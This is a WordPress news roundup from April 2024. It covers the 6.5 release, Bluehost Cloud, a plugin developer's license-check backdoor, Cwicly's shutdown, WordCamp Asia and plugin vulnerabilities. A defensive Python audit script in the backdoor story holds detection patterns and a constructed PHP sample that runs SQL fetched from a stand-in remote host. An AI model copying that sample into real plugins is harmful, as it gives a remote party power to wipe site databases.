📆 This is the April 2024 edition of “This Month in WordPress with CodeinWP.”
Hey WordPress fans, I am back with your latest dose of WordPress news and events from the past month…or so.
In the biggest news of the month, WordPress 6.5 is being shipped today after having been pushed back from March 26th. Bluehost also launched a new cloud hosting service, along with what appears to be a pretty tight partnership with Automattic.
Plus, there were two big stories when it comes to WordPress plugins, including a developer intentionally building in a backdoor to his plugin to catch people using it without a license. Wild stuff!
Beyond that, I have lots of smaller tidbits to share, including WordCamp Asia 2024 and 2025, the DE{CODE} conference, installing WordPress on a Raspberry Pi, and more.
April 2024 WordPress News with CodeinWP
WordPress 6.5 release
The biggest news of the month is the release of WordPress 6.5, which was pushed back from March 26th (its original release date) to April 2nd.
You can read this post on the Make WordPress Core blog to learn why it was pushed back. Some of the main issues seem to involve the Font Library feature, which had already been pushed back since that feature was originally intended for WordPress 6.4.
However, because we saw multiple Release Candidates in March, I can still share some of the biggest new features for users and developers.
WordPress 6.5 notable new features for users:
- Font Library – we should hopefully get access to the Font Library feature that was originally scheduled for WordPress 6.4 and also caused issues with the WordPress 6.5 release date. You’ll be able to more easily install and use multiple fonts for block themes.
- List view improvements – you now get more control in List View in the editor. You can rename blocks, right-click blocks to see settings, and more.
- Improved style revisions – you can now more easily view past revisions in the style manager. One improvement that I find especially useful is that you’ll now be able to see a brief text summary of what each revision contains (e.g. “Changed style for the Button block”).
- New design options – you can access some new design options in core blocks, including improved background images for the Group block, shadow support for Column(s) and Image blocks, and aspect ratio support for the Cover block.
- Option to duplicate patterns – you can now duplicate and rename an existing pattern on your site. I think that this will be really handy for creating similar but distinct patterns.
- AVIF image format support – you’ll now be able to upload AVIF images directly to the Media Library. If you want an easy way to convert your existing images to AVIF, you can use an image optimization plugin (our tool Optimole can do that).
WordPress 6.5 notable new features for developers:
- Block Bindings API – this new API will help developers connect blocks to various data sources, including custom fields, site data, user data, and more. This API is a work in progress, though. In 6.5, it added the ability to connect block attributes and custom fields, but this functionality will continue to grow over time.
- Interactivity API – this new API will help developers standardize adding interactive elements to blocks, which will aid them in more easily building modern front-end interfaces. You can check out the WP Movies dev site for a showcase of what the Interactivity API can do.
- Plugin dependencies – a lot of WordPress plugins require other plugins to be installed in order to function. For example, our Sparks plugin only works on sites using the WooCommerce plugin. Plugin developers now have an official way to control these dependencies by adding a “Requires Plugins” entry into the plugin header. These required plugins will show up in the WordPress plugins list.
The features above are by no means a complete list – they’re just some of the features that I found to be the most interesting for casual users and developers.
Because WordPress 6.5 is a major feature release*, you do not need to apply the update right away. In fact, I usually recommend waiting a couple of weeks just to make sure any potential issues are ironed out.
*In contrast, I always recommend applying security and maintenance releases right away.
Bluehost launches new cloud hosting service powered by WP Cloud
In early March, Bluehost announced the launch of a new managed WordPress hosting service called Bluehost Cloud.
Normally, I wouldn’t find a new hosting service especially noteworthy, but there are two things that I find especially interesting about this launch.
First off, Bluehost Cloud is based on WP Cloud. If you don’t remember this name (I talked about it all the way back in October 2022), WP Cloud is a service from Automattic that helps hosting companies access “the tools [they] need to add scalable, highly available, extremely fast WordPress hosting to [their] product offering”.
The second interesting thing about this launch is that it seems to be part of a partnership with Automattic. Bluehost Cloud is now listed on the regular WordPress.com Pricing page, right beside the WordPress.com Entrepreneur plan.
Given this type of commercial relationship between WordPress.com and Bluehost, I wouldn’t be surprised to see this draw additional scrutiny to the WordPress.org recommended hosting page, where Bluehost has long been recommended and people have taken issue with the lack of transparency around which hosts get listed there.
Bluehost’s parent company invested in Automattic all the way back in 2014 (back when the Bluehost parent was known as Endurance International Group), so the companies have long had a business connection.
Bluehost Cloud prices start at $79.99 per month with regular pricing, but are available at a promo rate of $29.99 per month for the first year. On the WordPress.com Pricing page, however, the Bluehost Cloud plan is listed at $65 per month.
A WordPress plugin added a backdoor to harm the websites of people using it without a license
I saw this next story generate a ton of controversy in some popular WordPress Facebook groups, and rightfully so.
In March, a user in the Bricks plugin Facebook group accused the third-party BricksUltimate add-on of adding a backdoor in its code that lets the plugin drop database tables from sites (such as wp_posts or wp_users, which would pretty much completely disable the site and delete important data).
Note – I want to make it totally clear that all of this revolves around a third-party add-on for Bricks. None of what I’m talking about here applies to the actual Bricks plugin.
Was the plugin hacked? Was somebody inserting malware in an otherwise quality plugin?
Nope! It turns out that the plugin’s developer had intentionally added this code to the plugin in a bid to protect against people using “pirated” copies of the plugin.
I put “pirated” in quotes because I’m not sure the term pirating even makes sense when talking about GPL software.
Every three hours, the plugin checked for an active license. If the license check failed, the developer had the ability to inject any SQL commands, including dropping some or all of the site’s database tables.
To make matters worse, the developer seems to have initially doubled down when this backdoor was publicized in the Facebook groups, which wasn’t a great look.
The developer did eventually apologize, removing the offending code and posting an apology in the Facebook groups and on his website.
Look – I totally understand that seeing people use your plugin without paying is frustrating for developers. But this is absolutely not the way to go about combating it (and it’s even illegal in a lot of countries, including the USA).
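If you want to check the add-ons installed on your own site for the pattern described above (a scheduled remote call whose response can reach the database), here is a small static audit. It is an added example, not code from BricksUltimate or from the original post; the two PHP samples, the `example_*` names and the `.invalid` URL are constructed, and the signals are heuristics that only tell you which files to read by hand.

```python
import re

# Heuristic signals only; the function names matched are real WordPress/PHP APIs.
SIGNALS = {
    "remote_call": re.compile(
        r"\b(wp_remote_(get|post|request)|wp_safe_remote_(get|post)|curl_exec)\s*\("),
    "scheduled": re.compile(r"\bwp_schedule_(single_)?event\s*\("),
    # $wpdb->query( whose argument is neither a string literal nor $wpdb->prepare(...)
    "dynamic_query": re.compile(
        r"\$wpdb\s*->\s*query\s*\((?!\s*\$wpdb\s*->\s*prepare\b)(?!\s*['\"])"),
    "destructive_sql": re.compile(r"\b(DROP|TRUNCATE)\s+TABLE\b", re.I),
}

def scan(php_source):
    """Return {signal_name: [line numbers]} for every signal found in the source."""
    hits = {}
    for lineno, line in enumerate(php_source.splitlines(), 1):
        if line.lstrip().startswith(("//", "#", "*")):
            continue  # skip obvious comment lines
        for name, pattern in SIGNALS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(lineno)
    return hits

def verdict(hits):
    """'high': a remote call and a dynamic query share a file; 'review': an SQL signal alone."""
    if "remote_call" in hits and "dynamic_query" in hits:
        return "high"
    if "dynamic_query" in hits or "destructive_sql" in hits:
        return "review"
    return "none"

# Constructed sample: a scheduled check that passes a remote response to the database.
SUSPICIOUS = r"""<?php
wp_schedule_event(time(), 'hourly', 'example_license_check');
function example_license_check() {
    global $wpdb;
    $reply = wp_remote_post('https://licensing.example.invalid/check');
    $wpdb->query(wp_remote_retrieve_body($reply));
}"""

# Constructed sample: an ordinary prepared statement, which should not be flagged.
BENIGN = r"""<?php
function example_touch($id) {
    global $wpdb;
    $wpdb->query($wpdb->prepare("UPDATE {$wpdb->prefix}example SET seen = 1 WHERE id = %d", $id));
}"""
```

To audit a real site, run `scan()` over each `.php` file under `wp-content/plugins` and read every file that comes back `high` or `review`. Uninstall routines legitimately drop their own tables, so a `review` verdict is a prompt to look, not proof of a backdoor.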
Cwicly abruptly discontinues development
Next, let’s look at another bit of plugin-related drama.
Cwicly is/was a plugin that extends the block editor with a number of new features and functionalities. The plugin seemed to be growing well, with a lot of happy users.
However, in early March, the Cwicly developer abruptly announced that he would be discontinuing development of the plugin because of “the relentless onslaught of destructive posts and comments by certain WordPress influencers”.
That includes “personal attacks on both myself and team members” which have “taken a significant toll on our morale and motivation”.
Those quotes are part of a longer email that he sent to Cwicly users, which you can read in full in this Search Engine Journal post.
While I feel for the Cwicly team, this abrupt discontinuation is obviously a huge blow to people who have built their own websites (or client websites) using Cwicly. Those users will now need to hurry to rebuild those sites using a different tool.
To its credit, the Cwicly team is at least refunding all payments that were made in 2024 and has pledged to continue supporting customers with security and bug fixes through the end of 2024. They will also offer paid maintenance plans in 2025 and onwards.
This will at least give people some time to move their sites to a different solution.
Unfortunately, I think this event could mean that some users will be less likely to try new products when building websites. If you have to choose between an upstart tool or an established player, the established player might start looking more attractive.
WP Tavern has a good post about the issue, including lots of reactions from people in the WordPress community. WPJohnny also shared his thoughts on the topic.
Can you install WordPress on a Raspberry Pi? Joe found out
Ever had the urge to install WordPress in weird places? I can’t say that I have, but I obviously don’t speak for all of us because Joe Warnimont just spent a day installing WordPress on his Raspberry Pi.
If you want to learn how Joe did it, you can check out his full step-by-step tutorial here.
DE{CODE} 2024: AI and WordPress development (+ other talks)
As I mentioned last month, WP Engine’s DE{CODE} 2024 virtual developer conference was held on March 19th (and 21st), which marked the fifth year that the all-day event was held.
One of the more topical talks was a 23-minute presentation from the WP Engine founder (Jason Cohen) and one of WP Engine’s product managers (Luke Patterson), along with some other speakers.
The talk focuses on how WordPress developers can use AI tools in real-world situations, along with what the future of WordPress development might look like in a world where these tools exist.
If you want to see even more talks, you can check out a full YouTube playlist of all the DE{CODE} 2024 talks.
WordCamp Asia 2024 finishes up in Taipei, Taiwan
In early March, WordCamp Asia 2024 went off without a hitch.
Over 1,300 people headed off to Taiwan to visit the Taipei International Convention Center for three days of WordPress-related talks and networking.
If you weren’t able to attend, you can watch all of the WordCamp Asia 2024 talks on YouTube.
I’ve also put together some posts from around the web that recap WordCamp Asia 2024:
- Freemius recap
- GoDaddy recap
- WordPress.org highlights post
- Jetpack recap
- WordPress.org podcast episode (it’s only nine minutes)
While on the topic of WordCamp Asia, we also now know where and when the 2025 version will be.
WordCamp Asia 2025 will be held in February 2025 in Manila, Philippines.
The WordCamp Asia 2025 website is up and they’ve already put out a call for organizers. If you’re located in Manila (or anywhere else) and want to help the 2025 event be a success, you can submit this form on Google Forms to join the team.
State of the Word outside the USA for the second year straight
For much of its history, Matt Mullenweg gave his annual State of the Word address at WordCamp USA.
However, in early March, Matt announced that he will present the 2024 State of the Word from Tokyo, Japan, marking the second time in a row that the address has happened outside the USA.
Last year, Matt gave the address from Madrid, Spain, which was the first time the speech had been held outside of the USA.
Fittingly, Matt announced this as part of the Q&A session at WordCamp Asia 2024 in Taipei.
In the WP Tavern post about this, I found one really interesting detail about Japan’s connection to WordPress.
According to Shusei Toda, a Tokyo-based WordCamp Asia 2024 organizer, an incredible 82.3% of Japanese websites use WordPress, which is almost double the global average of 43.5%.
Some vulnerabilities in popular WordPress plugins and themes
Finally, let’s finish with a rapid-fire rundown of some security vulnerabilities in popular themes and plugins that were discovered in the past month:
- Essential Addons for Elementor – Wordfence discovered a stored XSS vulnerability in this massively popular third-party add-on for Elementor. If you’re not using at least version 5.9.12 (released on March 25th), you’ll want to update ASAP.
- Astra theme – on March 23, the developers of the popular Astra theme quietly patched a stored XSS vulnerability in the core theme that’s available at WordPress.org. If you’re not using at least version 4.6.9 of the core Astra theme, you’ll want to update ASAP.
- Create by Mediavine – on March 19, Wordfence published a critical vulnerability in Create by Mediavine (a plugin that offers recipe cards and other elements popular with Mediavine publishers). If you’re not using at least version 1.9.5 of the plugin, you should update it ASAP.
- File Manager and File Manager Pro – on March 4, Wordfence published a critical vulnerability that affects both the File Manager and File Manager Pro plugins, two very popular plugins that people use to manage files from their WordPress dashboards. This vulnerability was patched in version 7.2.2 of the free version at WordPress.org and version 8.3.5 of the Pro version.
That sums up our April 2024 WordPress news roundup. Anything we missed?
Layout and presentation by Karol K.